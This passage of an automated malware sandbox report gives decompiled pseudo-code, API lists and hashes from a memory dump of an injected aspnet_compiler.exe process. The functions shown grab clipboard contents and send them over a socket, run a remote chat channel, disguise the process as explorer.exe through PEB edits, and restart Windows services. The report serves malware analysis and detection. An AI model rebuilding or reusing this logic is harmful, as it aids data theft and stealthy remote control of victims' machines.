                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: fdd6ef0341d715ca66b4f226cea273408d1dce2abc93341c621d467a1a4981a0
                • Instruction ID: e7023db14128a88f38c155e4c92a359c255939900931c8e81202aef98a64c706
                • Opcode Fuzzy Hash: fdd6ef0341d715ca66b4f226cea273408d1dce2abc93341c621d467a1a4981a0
                • Instruction Fuzzy Hash: 49A148319141089FDF199F68DC517AE3BA0AF4A329F14015EFC11DF392D7388856CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00413EF7 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                Download Yara Rule
                C-Code - Quality: 38%
                			E00413EF7(char _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed char _a28) {
				intOrPtr _v0;
				short _v4;
				char _v8;
				char* _v12;
				signed short _v20;
				intOrPtr _v24;
				char _t36;
				short _t37;
				intOrPtr* _t44;
				void* _t47;
				void* _t49;
				char* _t52;
				signed short* _t58;
				signed char _t63;
				intOrPtr _t64;
				signed short _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t73;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t77 =  &_v12;
				_t36 =  *((intOrPtr*)("65535")); // 0x33353536
				_v8 = _t36;
				_t37 =  *0x46a5f0; // 0x35
				_t74 = _a4;
				_v4 = _t37;
				_v12 =  &_v8;
				if(_t74 == 0 || _a8 < 0x10) {
					L42:
					return 0x2afb;
				} else {
					_t71 = 2;
					if( *_t74 != _t71) {
						return 0x273f;
					}
					_t76 = _a24;
					_t64 = _a20;
					_t73 = _a16;
					if(_a12 == 0 || _t73 == 0) {
						if(_t64 == 0 || _t76 == 0) {
							return 0x2af9;
						} else {
							goto L8;
						}
					} else {
						L8:
						_t63 = _a28;
						_t42 = _t63 & 0x00000006;
						if((_t63 & 0x00000006) != 6) {
							if(_t64 == 0 || _t76 == 0) {
								L21:
								if(_a12 == 0 || _t73 == 0) {
									L40:
									return 0;
								} else {
									_t44 =  *((intOrPtr*)(_t74 + 4));
									_a4 = _t44;
									if((_t63 & 0x00000002) == 0) {
										_t44 =  &_a4;
										__imp__#51(_t44, 4, _t71);
										if(_t44 == 0) {
											L30:
											if((_t63 & 0x00000004) == 0) {
												_push(_v8);
												L37:
												__imp__#12();
												_t75 = _t44;
												L38:
												if(_t73 <= E00439290(_t75)) {
													goto L42;
												}
												E0044030E(_v4, _t73, _t75);
												goto L40;
											}
											__imp__#111();
											_t47 = _t44 - 0x2af9;
											if(_t47 == 0) {
												L34:
												return 0x2af9;
											}
											_t49 = _t47 - 1;
											if(_t49 == 0) {
												return 0x2afa;
											}
											if(_t49 == 1) {
												goto L42;
											}
											goto L34;
										}
										_t75 =  *_t44;
										if( *_t44 == 0) {
											goto L30;
										}
										if((_t63 & 0x00000001) != 0) {
											_t52 = L00413895(_t75, 0x2e);
											if(_t52 != 0) {
												 *_t52 = 0;
											}
										}
										goto L38;
									}
									_push(_t44);
									goto L37;
								}
							} else {
								_t69 =  *(_t74 + 2) & 0x0000ffff;
								_a8 = _t69;
								if((_t63 & 0x00000008) == 0) {
									_t72 = 0;
									_t54 =  ==  ? _t72 : "udp";
									_t42 = _t69 & 0x0000ffff;
									__imp__#56(_t42,  ==  ? _t72 : "udp");
									if(_t42 == 0) {
										L17:
										_push(_v0);
										L18:
										__imp__#15();
										E0041391A( &_v20, 6, "%u", _t42 & 0x0000ffff);
										_t58 =  &_v20;
										_t77 = _t77 + 0x10;
										L19:
										if(_t76 <= E00439290(_t58)) {
											goto L42;
										}
										E0044030E(_a8, _t76, _v24);
										_t77 = _t77 + 0xc;
										_t71 = 2;
										goto L21;
									}
									_t42 =  *_t42;
									if(_t42 == 0) {
										goto L17;
									}
									_v20 = _t42;
									goto L19;
								}
								_push(_t69);
								goto L18;
							}
						}
						return 0x2726;
					}
				}
			}

























                0x00413ef7
                0x00413efa
                0x00413f00
                0x00413f04
                0x00413f0c
                0x00413f10
                0x00413f19
                0x00413f20
                0x004140be
                0x00000000
                0x00413f31
                0x00413f33
                0x00413f37
                0x00000000
                0x00413f39
                0x00413f48
                0x00413f4c
                0x00413f50
                0x00413f54
                0x00413f5c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00413f6a
                0x00413f6a
                0x00413f6a
                0x00413f70
                0x00413f75
                0x00413f83
                0x00414013
                0x00414018
                0x004140b3
                0x00000000
                0x00414026
                0x00414026
                0x00414029
                0x00414030
                0x00414038
                0x0041403d
                0x00414045
                0x00414065
                0x00414068
                0x0041408e
                0x00414092
                0x00414092
                0x00414098
                0x0041409a
                0x004140a3
                0x00000000
                0x00000000
                0x004140ab
                0x00000000
                0x004140b0
                0x0041406a
                0x00414075
                0x00414077
                0x00414083
                0x00000000
                0x00414083
                0x00414079
                0x0041407c
                0x00000000
                0x00414087
                0x00414081
                0x00000000
                0x00000000
                0x00000000
                0x00414081
                0x00414047
                0x0041404b
                0x00000000
                0x00000000
                0x00414050
                0x00414055
                0x0041405e
                0x00414060
                0x00414060
                0x0041405e
                0x00000000
                0x00414050
                0x00414032
                0x00000000
                0x00414032
                0x00413f91
                0x00413f91
                0x00413f95
                0x00413f9c
                0x00413fa3
                0x00413fac
                0x00413fb0
                0x00413fb4
                0x00413fbc
                0x00413fca
                0x00413fca
                0x00413fce
                0x00413fce
                0x00413fe4
                0x00413fe9
                0x00413fed
                0x00413ff0
                0x00413ff9
                0x00000000
                0x00000000
                0x00414008
                0x0041400d
                0x00414012
                0x00000000
                0x00414012
                0x00413fbe
                0x00413fc2
                0x00000000
                0x00000000
                0x00413fc4
                0x00000000
                0x00413fc4
                0x00413f9e
                0x00000000
                0x00413f9e
                0x00413f83
                0x00000000
                0x00413f77
                0x00413f54

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 65535$udp
                • API String ID: 0-1267037602
                • Opcode ID: f017f730da5f423951df016acc56fe018b36abbe325d1b6e8ffc0416dff523dd
                • Instruction ID: dec2bdb26369982db7c5889bd327832f44181b2331e29388f4f60b1078a915a5
                • Opcode Fuzzy Hash: f017f730da5f423951df016acc56fe018b36abbe325d1b6e8ffc0416dff523dd
                • Instruction Fuzzy Hash: A551E235649301ABE7209E26D904BA77BE4ABC8711F08082FFA4593390D67DCDC18A5F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043913A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E0043913A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				char* _t31;
				int _t35;
				int _t43;
				void* _t51;
				int _t52;
				int _t54;
				void* _t56;
				void* _t63;
				short* _t64;
				short* _t67;

				_t62 = __edx;
				E004390B7(_t51,  &_v28, __edx, _a24);
				_t52 = 0;
				_t54 =  *(_v24 + 0x14);
				_t31 = _a4;
				_v8 = _t54;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E0043EEAD())) = 0x16;
					E0043A5BB();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t52;
				}
				_t66 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t64 = E00444A38(_t54, _t35 + _t35);
						_t56 = _t63;
						if(_t64 != 0) {
							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
								_t67 = E00444A38(_t56, _t66 + _t66);
								if(_t67 != 0) {
									_t43 = E00446260(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
											_t52 = _v12;
										} else {
											E0043EE77(GetLastError());
										}
									}
								}
								E00445002(_t67);
							} else {
								E0043EE77(GetLastError());
							}
						}
						E00445002(_t64);
					} else {
						E0043EE77(GetLastError());
					}
					goto L18;
				}
			}



















                0x0043913a
                0x0043914a
                0x00439152
                0x00439154
                0x00439157
                0x0043915a
                0x0043915f
                0x00439174
                0x00439179
                0x0043917f
                0x00439251
                0x00439255
                0x0043925a
                0x0043925a
                0x00439268
                0x00439268
                0x00439161
                0x00439166
                0x00000000
                0x00000000
                0x00439168
                0x0043916d
                0x00000000
                0x00439189
                0x00439192
                0x00439198
                0x0043919d
                0x004391ba
                0x004391bc
                0x004391bf
                0x004391da
                0x004391f3
                0x004391f8
                0x00439208
                0x00439210
                0x00439215
                0x0043922e
                0x0043923f
                0x00439230
                0x00439237
                0x0043923c
                0x0043922e
                0x00439215
                0x00439243
                0x004391dc
                0x004391e3
                0x004391e3
                0x00439248
                0x0043924a
                0x0043919f
                0x004391a6
                0x004391ab
                0x00000000
                0x0043919d

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439192
                • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043919F
                • __dosmaperr.LIBCMT ref: 004391A6
                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004391D2
                • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004391DC
                • __dosmaperr.LIBCMT ref: 004391E3
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 00439226
                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439230
                • __dosmaperr.LIBCMT ref: 00439237
                • _free.LIBCMT ref: 00439243
                • _free.LIBCMT ref: 0043924A
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                • String ID:
                • API String ID: 2441525078-0
                • Opcode ID: 387fdbec446251a5819ea95fd4c06fc554ddba64297b234dd1e89704fec95358
                • Instruction ID: 02b817c51ddb1bfcd431cbf40756152772ff8ffa7747545afeb7dfc7970056dd
                • Opcode Fuzzy Hash: 387fdbec446251a5819ea95fd4c06fc554ddba64297b234dd1e89704fec95358
                • Instruction Fuzzy Hash: 5A31D37140460BBFEF116FA5DC45CAF3B68EF09325F1002AAF810662A1DB78CD10DBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E00405480(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t28;
				char* _t36;
				intOrPtr _t45;
				intOrPtr _t46;
				void* _t57;
				intOrPtr _t69;
				void* _t111;
				void* _t113;
				void* _t115;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t126 = __eflags;
				_t101 = __edx;
				_t69 = _a4;
				E004020D6(_t69,  &_v104, __edx, __eflags, _t69 + 0xc);
				SetEvent( *(_t69 + 0x24));
				_t28 = E00401F8B( &_v108);
				E00404182( &_v108,  &_v60, 4, 0xffffffff);
				_t121 = (_t118 & 0xfffffff8) - 0x5c;
				E004020D6(_t69, _t121, _t101, _t126, 0x472ec8);
				_t122 = _t121 - 0x18;
				E004020D6(_t69, _t122, _t101, _t126,  &_v76);
				E0041A976( &_v140, _t101);
				_t123 = _t122 + 0x30;
				_t111 =  *_t28 - 0x3a;
				if(_t111 == 0) {
					E00401E45( &_v116, _t101, _t117, __eflags, 0);
					_t36 = E0040245C();
					E00401F8B(E00401E45( &_v120, _t101, _t117, __eflags, 0));
					_t101 = _t36;
					_t113 = E00411235();
					__eflags = _t113;
					if(_t113 == 0) {
						L7:
						E00401E6D( &_v116, _t101);
						E00401FB8();
						E00401FB8();
						__eflags = 0;
						return 0;
					}
					 *0x470af0 = E004114AA(_t113, "DisplayMessage");
					_t45 = E004114AA(_t113, "GetMessage");
					_t104 = "CloseChat";
					 *0x470ae8 = _t45;
					_t46 = E004114AA(_t113, "CloseChat");
					_t124 = _t123 - 0x18;
					 *0x470aec = _t46;
					 *0x470ae5 = 1;
					E004020D6(_t69, _t124, "CloseChat", __eflags, 0x472f60);
					_push(0x74);
					E00404A81(_t69, _t104, __eflags);
					L10:
					_t115 = HeapCreate(0, 0, 0);
					__eflags =  *0x470ae8(_t115,  &_v140);
					if(__eflags != 0) {
						_t124 = _t124 - 0x18;
						E00402097(_t69, _t124, _t104, _t117, __eflags, _v140, _t51);
						_push(0x3b);
						E00404A81(_t69, _t104, __eflags);
						HeapFree(_t115, 0, _v176);
					}
					goto L10;
				}
				_t128 = _t111 != 1;
				if(_t111 != 1) {
					goto L7;
				}
				_t57 =  *0x470af0(E00401F8B(E00401E45( &_v116, _t101, _t117, _t128, 0)));
				_t129 = _t57;
				if(_t57 == 0) {
					goto L7;
				}
				E0040415E(_t69,  &_v80, _t101, _t117, 0x464070);
				_t101 =  &_v84;
				E0041A879(_t69, _t123 - 0x18,  &_v84);
				_push(0x3b);
				E00404A81(_t69,  &_v84, _t129);
				E00401EE9();
				L4:
				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}

































                0x00405480
                0x00405480
                0x0040548e
                0x00405497
                0x0040549f
                0x004054a9
                0x004054bd
                0x004054c2
                0x004054cc
                0x004054d1
                0x004054db
                0x004054e4
                0x004054e9
                0x004054ec
                0x004054ef
                0x0040559e
                0x004055a5
                0x004055b8
                0x004055bd
                0x004055c6
                0x004055c8
                0x004055ca
                0x00405573
                0x00405577
                0x00405580
                0x00405589
                0x00405590
                0x00405596
                0x00405596
                0x004055dd
                0x004055e4
                0x004055e9
                0x004055ee
                0x004055f5
                0x004055fa
                0x004055fd
                0x00405604
                0x00405610
                0x00405615
                0x00405619
                0x0040561e
                0x00405627
                0x00405637
                0x00405639
                0x0040563b
                0x00405645
                0x0040564a
                0x0040564e
                0x00405659
                0x00405659
                0x00000000
                0x00405639
                0x004054f5
                0x004054f8
                0x00000000
                0x00000000
                0x0040550e
                0x00405515
                0x00405517
                0x00000000
                0x00000000
                0x00405522
                0x0040552a
                0x00405530
                0x00405535
                0x00405539
                0x00405542
                0x00000000
                0x00405547
                0x0040555e
                0x00405569
                0x00405569
                0x00405571
                0x00000000
                0x00000000
                0x00000000

                APIs
                • SetEvent.KERNEL32(?,?), ref: 0040549F
                • GetMessageA.USER32 ref: 0040554F
                • TranslateMessage.USER32(?), ref: 0040555E
                • DispatchMessageA.USER32 ref: 00405569
                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00472F60), ref: 00405621
                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                • String ID: CloseChat$DisplayMessage$GetMessage
                • API String ID: 2956720200-749203953
                • Opcode ID: 9a9cef7513b8a7c28d617c5da1d5a4d1d9789a6d3744142bf81144b806ac5329
                • Instruction ID: ded252b4ff533e87208d36ac19c2d613ad87dfbb1ef060abaf95112ea2b93138
                • Opcode Fuzzy Hash: 9a9cef7513b8a7c28d617c5da1d5a4d1d9789a6d3744142bf81144b806ac5329
                • Instruction Fuzzy Hash: 7B419271A043016BCA04FB75DC5A86F77A9EBC5714F40093EFA06A31E5DF398905CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406A20 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 99COMMON
                Download Yara Rule
                C-Code - Quality: 15%
                			E00406A20(void* __edx, void* __esi, void* __ebp) {
				char _v4;
				signed int _v20;
				void* __ebx;
				void* __ecx;
				signed int _t19;
				void* _t40;
				void* _t48;
				intOrPtr _t49;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t56;
				char* _t57;
				void* _t59;
				signed int _t65;

				_t56 = __ebp;
				_t53 = __esi;
				_t52 = _t48;
				if(_t52 != 0) {
					L3:
					 *0x470b04(_t53, _t56);
					_t54 = E004068CB();
					if(_t52 == 0) {
						_t49 =  *((intOrPtr*)(_t54 + 0x10));
						_t57 = L"explorer.exe";
						 *0x473968 =  *(_t49 + 0x3c);
						 *0x47396c =  *(_t49 + 0x44);
						_t19 =  *0x470b14; // 0x0
					} else {
						_t57 =  *0x47396c;
						_t19 =  *0x473968;
					}
					 *0x470afc( *((intOrPtr*)(_t54 + 0x10)) + 0x38, _t19);
					 *0x470afc( *((intOrPtr*)(_t54 + 0x10)) + 0x40, _t57);
					if(_t52 != 0) {
						_v20 = _v20 & 0x00000000;
						 *0x470b0c(GetCurrentProcess(), 0x470b14,  &_v20, 0x8000);
						 *0x470b14 =  *0x470b14 & 0x00000000;
						_t65 =  *0x470b14;
					}
					E00406874(_t65, "PEB: %x\n", _t54);
					E0040683F(_t65);
					E00406874(_t65, "\n",  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x3c)));
					E0040683F(_t65);
					E00406874(_t65, "\n",  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x44)));
					 *0x470b10();
					return  *0x470af8(0, E0040697D, _t52);
				}
				 *0x470b14 =  *0x470b14 & 0x00000000;
				_t1 =  &_v4; // 0x473220
				_v4 = 0x1000;
				_t40 =  *0x470b00(GetCurrentProcess(), 0x470b14, 0, _t1, 0x3000, 4);
				_t62 = _t40;
				if(_t40 < 0) {
					_push("[-] NtAllocateVirtualMemory Error\n");
					return E00406874(__eflags);
				}
				E0043E0D9( *0x470b14, E0043A99F(GetCurrentProcess, _t48, _t62, L"windir"));
				E0043E0FB( *0x470b14, L"\\explorer.exe");
				_push("[+] NtAllocateVirtualMemory Success\n");
				E00406874(_t62);
				_t59 = _t59 + 0x18;
				goto L3;
			}


















                0x00406a20
                0x00406a20
                0x00406a29
                0x00406a2d
                0x00406a91
                0x00406a93
                0x00406a9e
                0x00406aa2
                0x00406ac1
                0x00406ac4
                0x00406acc
                0x00406ad4
                0x00406ad9
                0x00406aa4
                0x00406aa4
                0x00406aaa
                0x00406aaa
                0x00406ae6
                0x00406af4
                0x00406afc
                0x00406afe
                0x00406b15
                0x00406b1b
                0x00406b1b
                0x00406b1b
                0x00406b28
                0x00406b33
                0x00406b3e
                0x00406b49
                0x00406b4f
                0x00406b57
                0x00000000
                0x00406b6c
                0x00406a2f
                0x00406a36
                0x00406a49
                0x00406a54
                0x00406a5a
                0x00406a5c
                0x00406ab1
                0x00000000
                0x00406abb
                0x00406a6f
                0x00406a7f
                0x00406a84
                0x00406a89
                0x00406a8e
                0x00000000

                APIs
                • GetCurrentProcess.KERNEL32(00470B14,00000000, 2GBm@,00003000,00000004,00000000,00000001), ref: 00406A51
                • GetCurrentProcess.KERNEL32(00470B14,00000000,00008000,?,00000000,00000001,00000000,00406CCA,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406B12
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CurrentProcess
                • String ID: 2GBm@$PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                • API String ID: 2050909247-2552087879
                • Opcode ID: 73c293382bdeff948eb64d5676536ed9b638f881f9f110030419796dfdf152da
                • Instruction ID: acb57f4be5314c8fdc403cfcc3c6874ba858f2dc6f38655895ae1e2efeca9399
                • Opcode Fuzzy Hash: 73c293382bdeff948eb64d5676536ed9b638f881f9f110030419796dfdf152da
                • Instruction Fuzzy Hash: EC31D8B2642300EBC710FFA5DC45F1677B8AB45349F11443AF506A6191DBB8E954CB2D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00415881 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49clipboardCOMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E00415881(void* __ebp, void* _a8, char _a16, char _a24, char _a28, void* _a152, void* _a176) {
				void* __ebx;
				void* _t16;
				struct HWND__* _t23;
				void* _t38;
				void* _t41;

				if(OpenClipboard(_t23) != 0) {
					EmptyClipboard();
					CloseClipboard();
					if(OpenClipboard(_t23) != 0) {
						_t38 = GetClipboardData(0xd);
						_t16 = GlobalLock(_t38);
						GlobalUnlock(_t38);
						CloseClipboard();
						_t29 =  !=  ? _t16 : 0x46a8f0;
						E0040415E(_t23,  &_a28, _t34, __ebp,  !=  ? _t16 : 0x46a8f0);
						_t34 =  &_a24;
						E0041A879(_t23, _t41 - 0x18,  &_a24);
						_push(0x6b);
						E00404A81(0x4734e8,  &_a24, _t16);
						E00401EE9();
					}
				}
				E00401E6D( &_a16, _t34);
				E00401FB8();
				E00401FB8();
				return 0;
			}








                0x0041588a
                0x00415890
                0x00415896
                0x004158a5
                0x004158b3
                0x004158b6
                0x004158bf
                0x004158c5
                0x004158d2
                0x004158da
                0x004158e2
                0x004158e8
                0x004158ed
                0x004158f4
                0x00415c96
                0x00415c96
                0x004158a5
                0x0041611c
                0x00416128
                0x00416134
                0x00416141

                APIs
                • OpenClipboard.USER32 ref: 00415882
                • EmptyClipboard.USER32 ref: 00415890
                • CloseClipboard.USER32 ref: 00415896
                • OpenClipboard.USER32 ref: 0041589D
                • GetClipboardData.USER32 ref: 004158AD
                • GlobalLock.KERNEL32 ref: 004158B6
                • GlobalUnlock.KERNEL32(00000000), ref: 004158BF
                • CloseClipboard.USER32 ref: 004158C5
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                • String ID: 4G
                • API String ID: 2172192267-3080958808
                • Opcode ID: 1150ac069ea0e5be6ecf8168bf5002337176f77d960d035dfdd9d53e1e5f48f9
                • Instruction ID: 4d86aa06e49f03239fcc2a4fb0273d51e2f014b5d08f715770ad07ab5d505bde
                • Opcode Fuzzy Hash: 1150ac069ea0e5be6ecf8168bf5002337176f77d960d035dfdd9d53e1e5f48f9
                • Instruction Fuzzy Hash: 9D0121312083009BC314BF75EC596AE77A5BF90352F40493EFD06922A3DF38C946DA9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00419668 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E00419668(char _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				int _t22;
				void* _t26;
				void* _t27;

				_t22 = 0;
				_t27 = OpenSCManagerW(0, 0, 0x11);
				_t26 = OpenServiceW(_t27, E00401EE4( &_a4), 0xf003f);
				if(_t26 != 0) {
					if(ControlService(_t26, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t26,  &_v32);
						} while (_v28 != 1);
						StartServiceW(_t26, 0, 0);
						asm("sbb ebx, ebx");
						_t22 = 3;
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
					} else {
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
						_t22 = 2;
					}
				} else {
					CloseServiceHandle(_t27);
				}
				E00401EE9();
				return _t22;
			}








                0x00419673
                0x00419685
                0x00419694
                0x00419698
                0x004196b2
                0x004196c4
                0x004196c9
                0x004196cf
                0x004196d8
                0x004196e7
                0x004196ec
                0x004196ef
                0x004196f2
                0x004196b4
                0x004196bb
                0x004196be
                0x004196c0
                0x004196c0
                0x0041969a
                0x0041969b
                0x0041969b
                0x004196f7
                0x00419704

                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00418FE1,00000000), ref: 00419677
                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00418FE1,00000000), ref: 0041968E
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 0041969B
                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00418FE1,00000000), ref: 004196AA
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 004196BB
                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 004196BE
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Service$CloseHandle$Open$ControlManager
                • String ID:
                • API String ID: 221034970-0
                • Opcode ID: c6a6868a821c40bf285a10c9e2759082c71f22d9f97c071ba597590d66903f3d
                • Instruction ID: 3276af7575f15d8841acc4b0191f81aff6206dc885fe3b462974ed1c719105d3
                • Opcode Fuzzy Hash: c6a6868a821c40bf285a10c9e2759082c71f22d9f97c071ba597590d66903f3d
                • Instruction Fuzzy Hash: 0B11E5319042187FD710AF64ECC9CFF3BACDB52BA6B000036F915921D1DB688D469AF9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004469A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004469A1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x45b2e0) {
					E00445002(_t52);
					_t26 = _a4;
				}
				E00445002( *((intOrPtr*)(_t26 + 0x3c)));
				E00445002( *((intOrPtr*)(_a4 + 0x30)));
				E00445002( *((intOrPtr*)(_a4 + 0x34)));
				E00445002( *((intOrPtr*)(_a4 + 0x38)));
				E00445002( *((intOrPtr*)(_a4 + 0x28)));
				E00445002( *((intOrPtr*)(_a4 + 0x2c)));
				E00445002( *((intOrPtr*)(_a4 + 0x40)));
				E00445002( *((intOrPtr*)(_a4 + 0x44)));
				E00445002( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00446867(5,  &_v8);
				_v8 =  &_a4;
				return E004468B7(4,  &_v8);
			}




                0x004469a7
                0x004469aa
                0x004469b2
                0x004469b5
                0x004469ba
                0x004469bd
                0x004469c1
                0x004469cc
                0x004469d7
                0x004469e2
                0x004469ed
                0x004469f8
                0x00446a03
                0x00446a0e
                0x00446a1c
                0x00446a24
                0x00446a2d
                0x00446a35
                0x00446a49

                APIs
                • _free.LIBCMT ref: 004469B5
                  • Part of subcall function 00445002: HeapFree.KERNEL32(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                  • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                • _free.LIBCMT ref: 004469C1
                • _free.LIBCMT ref: 004469CC
                • _free.LIBCMT ref: 004469D7
                • _free.LIBCMT ref: 004469E2
                • _free.LIBCMT ref: 004469ED
                • _free.LIBCMT ref: 004469F8
                • _free.LIBCMT ref: 00446A03
                • _free.LIBCMT ref: 00446A0E
                • _free.LIBCMT ref: 00446A1C
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
